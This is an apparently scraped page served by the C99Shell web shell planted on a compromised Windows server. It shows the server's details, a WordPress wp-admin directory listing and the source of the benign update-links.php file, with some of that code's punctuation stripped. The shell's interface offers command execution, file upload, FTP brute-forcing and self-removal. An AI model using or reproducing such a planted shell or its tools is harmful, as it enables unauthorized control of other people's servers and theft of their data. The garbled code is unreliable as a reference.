!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\jaime\wordpress\wp-admin\   drwxrwxrwx
Free 8.8 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     update-links.php (1.44 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
require_once( dirnamedirname(__FILE__) ) . '/wp-config.php');
require_once( 
ABSPATH 'wp-includes/class-snoopy.php');

if ( !
get_option('use_linksupdate') )
    die(
__('Feature disabled.'));

$link_uris $wpdb->get_col("SELECT link_url FROM $wpdb->links");

if ( !
$link_uris )
    die(
'No links');

$link_uris urlencodejoin$link_uris"\n" ) );

$query_string "uris=$link_uris";

$http_request  "POST /updated-batch/ HTTP/1.0\r\n";
$http_request .= "Host: api.pingomatic.com\r\n";
$http_request .= 'Content-Type: application/x-www-form-urlencoded; charset='.get_settings('blog_charset')."\r\n";
$http_request .= 'Content-Length: ' strlen($query_string) . "\r\n";
$http_request .= 'User-Agent: WordPress/' $wp_version "\r\n";
$http_request .= "\r\n";
$http_request .= $query_string;

$response '';
if( 
false !== ( $fs fsockopen('api.pingomatic.com'80$errno$errstr5) ) ) {
    
fwrite($fs$http_request);
    while ( !
feof($fs) )
        
$response .= fgets($fs1160); // One TCP-IP packet
    
fclose($fs);
    
    
$response explode("\r\n\r\n"$response2);
    
$body trim$response[1] );
    
$body str_replace(array("\r\n""\r"), "\n"$body);
    
    
$returns explode("\n"$body);
    
    foreach (
$returns as $return) :
        
$time $wpdb->escapesubstr($return019) );
        
$uri $wpdb->escapepreg_replace('/(.*?) | (.*?)/''$2'$return) );
        
$wpdb->query("UPDATE $wpdb->links SET link_updated = '$time' WHERE link_url = '$uri'");
    endforeach;
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--